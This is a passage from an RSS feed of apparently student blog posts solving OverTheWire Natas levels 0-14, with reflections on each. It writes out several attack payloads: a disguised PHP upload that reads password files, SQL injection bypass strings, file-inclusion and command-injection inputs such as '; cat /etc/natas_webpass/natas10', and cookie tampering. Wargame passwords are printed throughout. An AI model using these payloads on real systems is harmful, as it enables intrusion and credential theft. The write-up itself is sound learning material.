&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_IWC3Y7i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/14gs4mr3b4l4a0dfgngs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_IWC3Y7i--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/14gs4mr3b4l4a0dfgngs.png" alt="Image description" width="672" height="51"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This creates a jpg which contains php code that reads out the password file.&lt;br&gt;
Uploading this to the website results in a clickable link that doesn’t do much.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cGRk0ByI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4otxbd9j41bpyrqor2zt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cGRk0ByI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4otxbd9j41bpyrqor2zt.png" alt="Image description" width="648" height="201"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To make this link do something, we change the extension of our file to .php so that the web server executes it as PHP instead of serving it as an image. The stored name comes from a hidden filename field in the upload form, so we edit that value in the dev tools before submitting, which gives us a link that prints out the password stored for the next level.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0anx6SiF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tinwmwl683eagfurwxve.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0anx6SiF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tinwmwl683eagfurwxve.png" alt="Image description" width="640" height="179"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pass for next level: &lt;strong&gt;lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 13&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--RY885P4x--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lu6pmhpnfa19vrztt3j9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--RY885P4x--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lu6pmhpnfa19vrztt3j9.png" alt="Image description" width="654" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now the site checks that the uploaded file is actually an image using the exif_imagetype function. Reading the documentation, this function reads the first bytes of a file and compares them against known image signatures; a return value of 2 (IMAGETYPE_JPEG) means JPEG. So we just need to prepend the JPEG signature bytes to our file to get past the check. I did this using hexedit, but any tool that can edit the bytes of a file will work here.&lt;br&gt;
After a quick search I found that I needed to set the first 4 bytes to&lt;br&gt;
FF D8 FF DB, the start of a raw JPEG file (exif_imagetype only looks at the leading FF D8 FF marker).&lt;br&gt;
I added 4 characters to my image file so I could change them using hexedit.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KOYEJd0---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/liqkfvmd86mi6h9ug6i4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KOYEJd0---/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/liqkfvmd86mi6h9ug6i4.png" alt="Image description" width="720" height="56"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--sx2l3UIS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gxv4xp5z508wq1pk2gsw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--sx2l3UIS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gxv4xp5z508wq1pk2gsw.png" alt="Image description" width="785" height="509"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I uploaded the image, changed its extension and received the password for the next level!&lt;br&gt;
Pass for next level: &lt;strong&gt;qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 14&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SYadGk-w--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dk5k83giiqcml49rsl87.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SYadGk-w--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dk5k83giiqcml49rsl87.png" alt="Image description" width="647" height="247"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We open up to a login screen. In the source code it’s made apparent that there is a mysql database.&lt;br&gt;
The query that is called looks like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;SELECT * from users where username="input" and password="input";&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The code then checks if any rows have been returned from the database. We can do a simple SQL injection that guarantees a row is returned, like so:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;SELECT * from users where username="" or ""="" and password="" or ""="";&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This works because &lt;code&gt;or ""=""&lt;/code&gt; is always true. As the regular query already wraps our input in double quotes, we only need to enter &lt;code&gt;" or ""="&lt;/code&gt; in each field to get the query we want. Note that AND binds tighter than OR, so the query is read as &lt;code&gt;username="" or (""="" and password="") or ""=""&lt;/code&gt;; it is the final &lt;code&gt;or ""=""&lt;/code&gt; that makes every row match, so the injection in the password field is the one doing the work.&lt;/p&gt;
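&lt;p&gt;An added example (not from the level's source) that puts the vulnerable query beside the parameterised fix, using a SQLite in-memory table with a placeholder secret. SQLite uses single quotes where the level uses double quotes, so the payload becomes &lt;code&gt;' or ''='&lt;/code&gt;. It also demonstrates the precedence subtlety: because AND binds tighter than OR, the same payload in the username field alone does not bypass the login.&lt;/p&gt;

```python
import sqlite3


def make_db():
    """Constructed users table; the secret is a placeholder, not a Natas password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas15', 'demo-placeholder-secret')")
    return db


def login_vulnerable(db, username, password):
    """Natas 14 style: both fields are pasted into the SQL text."""
    query = ("SELECT * FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return len(db.execute(query).fetchall()) > 0


def login_fixed(db, username, password):
    """Parameterised query: the driver sends the values separately from the SQL
    text, so quotes in the input are data, never syntax."""
    rows = db.execute("SELECT * FROM users WHERE username=? AND password=?",
                      (username, password)).fetchall()
    return len(rows) > 0


# In the password field this yields ...password='' or ''='' and the final OR is always true.
BYPASS = "' or ''='"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, bypass in both fields:   ", login_vulnerable(db, BYPASS, BYPASS))
    print("vulnerable login, bypass in username only: ", login_vulnerable(db, BYPASS, "wrong"))
    print("fixed login, bypass in both fields:        ", login_fixed(db, BYPASS, BYPASS))
```

&lt;p&gt;With the payload only in the username field the query reads &lt;code&gt;username='' or (''='' and password='wrong')&lt;/code&gt;, which is false; attackers usually get around that with a trailing comment sequence, which is why the fix has to be parameterisation rather than blocking one pattern.&lt;/p&gt;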

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EAsx8HvB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i3owqqn60qu5clt5y1lk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EAsx8HvB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i3owqqn60qu5clt5y1lk.png" alt="Image description" width="640" height="243"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Upon clicking login, we are through to the next level.&lt;br&gt;
Pass for next level: &lt;strong&gt;TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learnt&lt;/strong&gt;&lt;br&gt;
It was really fun getting to do some of the sql injections, as I've always heard about it - but never had the chance to do them. I learnt about how some verification methods work, like the exif_image checking bytes of a file. I also learnt that since code can be run on websites, many languages that run on the web, like javascript, php and java, can be exploited.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Solving Natas Levels 7-10</title>
      <dc:creator>Joon Yoo</dc:creator>
      <pubDate>Tue, 31 Oct 2023 13:29:29 +0000</pubDate>
      <link>https://dev.to/joonhyoo/solving-natas-levels-7-10-2k73</link>
      <guid>https://dev.to/joonhyoo/solving-natas-levels-7-10-2k73</guid>
      <description>&lt;p&gt;&lt;strong&gt;Natas Level 7&lt;/strong&gt;&lt;br&gt;
The level opens up with two buttons, Home and About. From my previous reading about PHP, I was aware that file inclusion bugs exist: when a page passes a URL parameter straight to include, changing the URL makes the server include whatever file you name. In this case there was a clue left in the comments that /etc/natas_webpass/natas8 holds the password, so I just entered that path into the ?page= query and boom&lt;br&gt;
pass for next level: &lt;strong&gt;a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 8&lt;/strong&gt;&lt;br&gt;
Similarly, this level opens up with a screen asking for a secret. This time, as I read about before, the secret is encoded by a function in the PHP script, and the encoded value sits in the source.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KzTIjGsb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/28y98uwzbtl8iql63bhh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KzTIjGsb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/28y98uwzbtl8iql63bhh.png" alt="Image description" width="539" height="207"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Reading the encodeSecret function, I can just reverse what it’s doing to decode the secret.&lt;/p&gt;

&lt;p&gt;Steps to decode:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Hex2bin&lt;/li&gt;
&lt;li&gt;Reverse string&lt;/li&gt;
&lt;li&gt;Base64_decode&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Following those steps and putting the result into the input box worked!&lt;br&gt;
pass for the next level: &lt;strong&gt;Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 9&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--lUnnibYv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xpqdgjkuhi8q3ehn3acz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--lUnnibYv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xpqdgjkuhi8q3ehn3acz.png" alt="Image description" width="659" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking into the source code we see that there is another php function that we can exploit!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--zzBq2Apz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7uw2zqz3q5t71h2psni1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--zzBq2Apz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7uw2zqz3q5t71h2psni1.png" alt="Image description" width="358" height="164"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I wasn’t sure if it would sanitize the input, so I tried a bunch of things. At the end of it I remembered back to when I solved Narnia 0 (a different OverTheWire wargame) and used ; to send multiple commands in. Noticing that this level was using shell commands, I considered trying something a bit more useful than grep.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--XaAcQJb8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8dk31oyf160teqkck0lv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--XaAcQJb8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8dk31oyf160teqkck0lv.png" alt="Image description" width="544" height="676"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bingo. From what I remember from previous levels, the passwords are stored in a particular folder, so I used cat to try and find it by entering: ; cat /etc/natas_webpass/natas10&lt;br&gt;
pass for next level: &lt;strong&gt;D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 10&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Ftm1fYhC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/osxggn8ehr2jlb69roog.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Ftm1fYhC--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/osxggn8ehr2jlb69roog.png" alt="Image description" width="645" height="306"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Upon reading the source code, it seems that they are checking the input using preg_match, a simple regex matching function for PHP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UYKftqes--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wns4v1bhzdymsybcayvq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UYKftqes--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wns4v1bhzdymsybcayvq.png" alt="Image description" width="439" height="214"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I won’t be able to use command injection anymore to just cat the file containing the password. Now we can try to attack the weakest thing there, which is the part that lets us use user input! The key changes depending on what we input: for example, when using the search term ‘africa’, grep searches for words that contain africa, and does so while ignoring case due to the -i flag.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--FriehZxm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s768fy3koamo8t52ozrr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--FriehZxm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s768fy3koamo8t52ozrr.png" alt="Image description" width="408" height="168"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Reading the grep man page, we can see that multiple files can be searched at once!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Jwb4ZB7g--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ekkk4fpjz7xfz5yn4u00.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Jwb4ZB7g--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ekkk4fpjz7xfz5yn4u00.png" alt="Image description" width="711" height="69"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This means we can likely use grep to expose the password for us again by searching /etc/natas_webpass/level11. However, since we’re using grep, we’ll need to use our input to try and guess letters in the password for it to spit it out. We’ll guess using a, so our input should look like&lt;br&gt;
Input: a /etc/natas_webpass/level11&lt;br&gt;
We know that the grep input worked, as it is now specifying the files from which grep is pulling text.&lt;br&gt;
Luckily, the password contained the letter ‘a’ so we are in!&lt;br&gt;
Pass for next level: &lt;strong&gt;1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learnt&lt;/strong&gt;&lt;br&gt;
I have previously learnt about the shell from one of my classes in university, but it was never used in an exploitative manner. Seeing these tools be used in this way taught me that even things designed to help people can be used in damaging ways. Something that has been taught to me in class is that developers should whitelist and not blacklist. A lot of these levels involve some form of blacklisting, and the vulnerability is in exploiting something that wasn't included in the blacklist.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Solving Natas Levels 4-6</title>
      <dc:creator>Joon Yoo</dc:creator>
      <pubDate>Tue, 31 Oct 2023 07:34:51 +0000</pubDate>
      <link>https://dev.to/joonhyoo/solving-natas-4-6-5e52</link>
      <guid>https://dev.to/joonhyoo/solving-natas-4-6-5e52</guid>
      <description>&lt;p&gt;&lt;strong&gt;Natas Level 4&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6rSbwzun--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bd1wkix9zwhupffmbjgm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6rSbwzun--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bd1wkix9zwhupffmbjgm.png" alt="Image description" width="643" height="189"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Upon opening the level, you see this. I was initially confused and refreshed the page, giving me a big hint.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hznzBhQT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jj3njdr894fipz8p95z0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hznzBhQT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jj3njdr894fipz8p95z0.png" alt="Image description" width="653" height="208"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I thought for a bit, and wondered if there was some information being sent to the site that could inform it of my "previous website". I tried things like visiting google.com and then entering in the natas4 site, which didn't work, and that brought up the idea that possibly some information is being directly sent to natas4. I did some googling and came across 'http refering' which made a lot of sense. I tried to figure out ways I could "give" natas4 an HTTP referer, and I knew of curl which could help transfer data to the site and back without me having to download any extra tools. After a bit of googling and documentation reading, I learnt that the HTTP referer could be sent in the request to a page like so:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--trVRlsCw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/plefs61z9pxl1j1xqpdo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--trVRlsCw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/plefs61z9pxl1j1xqpdo.png" alt="Image description" width="800" height="522"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After realising this worked, actually getting the password just required a bit of trial and error to type in the natas5 link properly.&lt;br&gt;
pass for next level: &lt;strong&gt;Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 5&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When logging into natas 5, I was greeted with an "access denied, user not logged in" which was funny since I just had to enter in a password. But considering this was a puzzle, I got to thinking and considered what that message could possibly mean. Maybe I needed to log in somewhere, or maybe I needed to use different login credentials for this site which could be hidden in the page?? After going through a couple things, it almost felt like Jesus spoke to me "COOKIES, THE ANSWER IS COOKIES". I pondered it a bit, and then realised that cookies were likely part of the solution. I had never dealt with cookies properly before besides always pressing the reject all button, so as with almost every level before this: I went to google and searched some stuff up. Basically I wanted to know how I could see the cookies that were being sent to the page, and how I could send my own to the page (hopefully) using curl. Funnily enough, searching something along those lines basically gave me the answer as curl is quite a powerful tool. The -c and -b flags came in useful, -c showing me the cookies, and -b letting me send my own cookies.&lt;br&gt;
Using the -c flag, I found that the cookie name was "loggedin" and was set to a value of "0"&lt;br&gt;
&lt;code&gt;curl --user natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD -c - 'http://natas5.natas.labs.overthewire.org'&lt;/code&gt;&lt;br&gt;
Using the -b flag I set this value to 1 and sent it to the site&lt;br&gt;
&lt;code&gt;curl --user natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD -b "loggedin=1" 'http://natas5.natas.labs.overthewire.org'&lt;/code&gt;&lt;br&gt;
After sending in my very own cookie, curl basically just spat out the password&lt;br&gt;
pass for next level: &lt;strong&gt;fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 6&lt;/strong&gt;&lt;br&gt;
This level was interesting; it opens up to a page with a new format: an input secret button. After clicking the button to open the source code I saw some HTML and this mystery language. The actual solution wasn't complex, but I did scratch my head trying to figure out what language the input secret button was written in. It turns out the HTML tag &lt;code&gt;&amp;lt;? ?&amp;gt;&lt;/code&gt; was for PHP, and I went down a rabbit hole trying to determine what that meant, but as it turned out it was a red herring and I needed to look at the include statement, which I always seem to forget means that there is a filesystem available.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ag50uDo7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1z9md5tt9gw5y5lfby42.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ag50uDo7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1z9md5tt9gw5y5lfby42.png" alt="Image description" width="574" height="192"&gt;&lt;/a&gt;&lt;br&gt;
Upon accessing the includes/secret.inc path, it spits out a secret that I can enter on the home page and get the password to the next level!&lt;br&gt;
pass for next level: &lt;strong&gt;jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I Learnt&lt;/strong&gt;&lt;br&gt;
I'm kind of shocked at how much a "game" can teach me about the web. Before I did these levels, I only had vague ideas of cookies and curl as a CLI. Now, although I wouldn't say I'm a pro by any means, I have more confidence in searching/reading documentation on how to use tools and understanding simple web structure. Once I was in the groove of thinking like an attacker and trying to "abuse" the site, I found it easier to keep trying different things and found a hunger for information that could help me solve the puzzle.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Solving Natas Levels 0-3</title>
      <dc:creator>Joon Yoo</dc:creator>
      <pubDate>Tue, 31 Oct 2023 06:59:55 +0000</pubDate>
      <link>https://dev.to/joonhyoo/solving-natas-level-0-3-3310</link>
      <guid>https://dev.to/joonhyoo/solving-natas-level-0-3-3310</guid>
      <description>&lt;p&gt;Hello all! This is a series of blog posts outlining my solutions to the "OverTheWire" wargame Natas. I'll also be adding my thoughts/things I learnt after each level, so hopefully there's more to learn than just how to capture the flag :D&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 0&lt;/strong&gt;&lt;br&gt;
This was an introductory problem and solving it just requires you to "inspect element" the page. The password is hidden as an HTML comment.&lt;br&gt;
pass for next level: &lt;strong&gt;g9D9cREhslqBKtcA2uocGHPfMZVzeFK6&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 1&lt;/strong&gt;&lt;br&gt;
Following similar ideas, except now right clicking was blocked. Using the F12 shortcut to open the dev tools revealed the password as an HTML comment like last time.&lt;br&gt;
pass for next level: &lt;strong&gt;h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 2&lt;/strong&gt;&lt;br&gt;
This level is a bit trickier than the last two, but all you need to know is that the image is a big hint. It reveals that there is a file system that can be routed to. The path of the image was from /files, so by accessing the /files route, a text document is revealed containing the password to the next level.&lt;br&gt;
pass for next level: &lt;strong&gt;G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Natas Level 3&lt;/strong&gt;&lt;br&gt;
This level hints at how the site might be hidden from a search engine. After some research, I learnt about robot meta tags which could instruct search engines not to show the page, but as mentioned previously: "Header info isn't part of the solution". Flowing off this tangent, I searched about robot meta tags and came across robots.txt files, which store user agents and can enforce certain user rules. In this case there was a wildcard user agent disallowing the /s3cr3ts route. Upon visiting this route, the password is made available.&lt;br&gt;
pass for next level: &lt;strong&gt;tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What I learnt&lt;/strong&gt;&lt;br&gt;
These were the introductory problems, so I didn't have too much issue solving them - though I did learn about file systems and the robot meta tag/txt files! It was interesting to see how simple things can become vulnerabilities.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
